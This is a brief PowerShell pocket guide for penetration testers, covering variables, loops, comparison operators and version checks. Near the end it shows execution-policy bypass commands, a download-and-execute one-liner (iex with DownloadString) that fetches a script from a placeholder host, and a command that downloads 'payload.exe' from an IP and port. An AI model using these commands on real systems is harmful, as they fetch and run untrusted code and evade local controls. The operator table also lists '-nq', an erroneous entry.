Powershell Basics

About

This is a pocket guide to PowerShell for penetration testers. Advanced users will get nothing out of this.

Variables

Setting Variables:

$a = get-process

Retrieving values:

$a <enter>

Conditionals

Put conditionals inside {}

Symbol

PowerShell

-lt

-gt

-le

-ge

-eq

-nq

Match String

-like

Get-Process | Where-Object {$_.ProcessName -Like '*con*'}

You can use ? to represent the output of the last command:

Get-Process | ? {$_.ProcessName -Like '*con*'}

Loops

Print all elements in $a:

$a | foreach {$_}

Execute a command returned by the loop use &:

$a | foreach {& $_} | select -first 5

Assign var $x to each elm:

foreach ($x in $a) {$x}

General Tips

Create a list split by a delim

$_.split(".")

Get current powershell version:

$PSVersionTable

Run older version of powershell:

powershell -version <version number>

Execution Policy

Execution policy is not a security protection. It is very easily bypassed. You can run PowerShell with the -noprofile to do so. You can also change the execution policy using:

Bypass Execution policy when running script

Get-Content C:\temp\script.ps1 | powershell.exe -noprofile -

Get Execution policy

Get-ExecutionPolicy -List

Set Execution policy

Set-ExecutionPolicy -Scope

Download and Run:

Powershell -nop "iex(New-Object Net.WebClient).DownloadString(`http://example.com/script.ps1`)"

Powershell -c `(New-Object System.Net.WebClient).Downloadfile('http://<IP>:<port>/payload.exe','payload.exe')`

Linux to PowerShell

Cat: Get-Content

Grep: -Select-String -pattern "password"

PreviousBash Basics NextAWS

Last updated 2 years ago